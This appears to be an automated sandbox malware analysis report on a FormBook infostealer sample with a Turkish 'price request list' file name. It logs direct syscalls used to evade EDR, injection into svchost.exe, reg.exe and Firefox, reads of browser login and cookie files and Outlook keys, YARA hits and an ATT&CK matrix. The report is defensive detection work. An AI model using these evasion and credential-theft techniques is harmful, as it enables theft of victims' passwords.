                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]2_2_03ABC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]2_2_03AB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]2_2_03A30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]2_2_03ABC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03AFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03A5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A830 mov eax, dword ptr fs:[00000030h]2_2_03A6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]2_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]2_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC810 mov eax, dword ptr fs:[00000030h]2_2_03ABC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]2_2_03ABE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]2_2_03ABE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]2_2_03AC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]2_2_03AC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A42840 mov ecx, dword ptr fs:[00000030h]2_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60854 mov eax, dword ptr fs:[00000030h]2_2_03A60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]2_2_03A34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]2_2_03A34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CF80 mov eax, dword ptr fs:[00000030h]2_2_03A6CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]2_2_03A62F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]2_2_03A62F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]2_2_03A4CFE0
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001E80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_001E80A9
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001BA124 SetUnhandledExceptionFilter,0_2_001BA124
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001BA155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtDeviceIoControlFile: Direct from: 0x77012AECJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtAllocateVirtualMemory: Direct from: 0x77012BECJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtAllocateVirtualMemory: Direct from: 0x770148ECJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtSetInformationThread: Direct from: 0x77012B4CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtQueryAttributesFile: Direct from: 0x77012E6CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtQueryVolumeInformationFile: Direct from: 0x77012F2CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtOpenSection: Direct from: 0x77012E0CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtQuerySystemInformation: Direct from: 0x770148CCJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtOpenKeyEx: Direct from: 0x77012B9CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtProtectVirtualMemory: Direct from: 0x77012F9CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtCreateFile: Direct from: 0x77012FECJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtOpenFile: Direct from: 0x77012DCCJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtQueryInformationToken: Direct from: 0x77012CACJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtTerminateThread: Direct from: 0x77012FCCJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtProtectVirtualMemory: Direct from: 0x77007B2EJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtAllocateVirtualMemory: Direct from: 0x77012BFCJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtReadFile: Direct from: 0x77012ADCJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtNotifyChangeKey: Direct from: 0x77013C2CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtCreateMutant: Direct from: 0x770135CCJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtSetInformationProcess: Direct from: 0x77012C5CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtResumeThread: Direct from: 0x770136ACJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtSetInformationThread: Direct from: 0x770063F9Jump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtWriteVirtualMemory: Direct from: 0x77012E3CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtMapViewOfSection: Direct from: 0x77012D1CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtAllocateVirtualMemory: Direct from: 0x77013C9CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtWriteVirtualMemory: Direct from: 0x7701490CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtClose: Direct from: 0x77012B6C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtReadVirtualMemory: Direct from: 0x77012E8CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtCreateKey: Direct from: 0x77012C6CJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtDelayExecution: Direct from: 0x77012DDCJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtQuerySystemInformation: Direct from: 0x77012DFCJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtQueryInformationProcess: Direct from: 0x77012C26Jump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtResumeThread: Direct from: 0x77012FBCJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeNtCreateUserProcess: Direct from: 0x7701371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\reg.exeThread register set: target process: 7464Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\reg.exeThread APC queued: target process: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31D4008Jump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001E87B1 LogonUserW,0_2_001E87B1
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00193B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00193B3A
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_001948D7
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F4C27 mouse_event,0_2_001F4C27
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe"Jump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001E7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001E7CAF
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001E874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_001E874B
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000002.3580687763.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182716298.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000002.3580687763.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182716298.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1342283987.0000000001B41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000002.3580687763.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182716298.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1342283987.0000000001B41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000002.3580687763.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182716298.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1342283987.0000000001B41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B862B cpuid 0_2_001B862B
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001C4E87
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001D1E06 GetUserNameW,0_2_001D1E06
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_001C3F3A
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001949A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3579520050.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3583192639.0000000005910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579268739.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579601950.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1260442665.0000000006120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1257841114.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3581016954.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1258855778.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeBinary or memory string: WIN_81
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeBinary or memory string: WIN_XP
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeBinary or memory string: WIN_XPe
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeBinary or memory string: WIN_VISTA
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeBinary or memory string: WIN_7
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeBinary or memory string: WIN_8
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3579520050.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3583192639.0000000005910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579268739.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579601950.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1260442665.0000000006120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1257841114.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3581016954.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1258855778.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00206283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00206283
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00206747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00206747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Modify Registry                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Virtualization/Sandbox Evasion                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
